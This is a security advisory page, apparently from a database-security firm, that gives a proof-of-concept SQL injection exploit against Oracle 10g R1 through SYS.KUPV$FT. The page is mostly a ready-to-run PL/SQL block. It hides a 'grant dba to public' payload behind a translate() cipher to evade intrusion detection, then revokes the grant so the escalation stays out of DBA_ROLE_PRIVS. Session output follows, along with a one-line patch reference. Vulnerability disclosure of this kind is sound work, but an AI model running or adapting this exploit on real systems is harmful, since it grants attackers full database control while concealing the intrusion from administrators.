Services
Information
Company |
SQL Injection via OracleKUPV$FT in Oracle 10g R1 with IDS evasion
Details The following proof of concept exploit code injects code for a privilege escalation (grant dba to public) via a cursor. The cursor is executed in the SYS context and grants the DBA permission to public and revokes the privileges directly after that. The advantage of this approach is that the current session has still DBA privileges but this is not visible in the Oracle view DBA_ROLE_PRIVS. If you compare this exploit code with the exploit from Andrea Purificato you will see that this exploits has less prerequisites (perl is not required, works via isqlplus, smaller and IDS evasion) Example -- with IDS evasion -- / SQL> DECLARE MYC NUMBER; MYB BOOLEAN; BEGIN MYC := DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(MYC,translate('uzikpsz fsprjp pnmghgjgna_msphapimwgh) ozrwh zczinmz wjjzuwpmz (rsphm uop mg fnokwi()igjjwm)zhu)', 'poiuztrewqlkjhgfdsamnbvcxy()=!','abcdefghijklmnopqrstuvwxyz'';:='),0); MYC:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 1=dbms_sql.execute ('||myc||')--',myb); END; / SQL> set role dba; SQL> revoke dba from public; SQL> select * from dba_role_privs where granted_role='DBA'; GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- SYS DBA YES YES WKSYS DBA NO YES SYSMAN DBA NO YES SYSTEM DBA YES YES Patch Information Apply the patches mentioned in Oracle Critical Patch Update January 2006. © 2007 by Red-Database-Security GmbH - 25-mar-2007 |
Definition Exploit |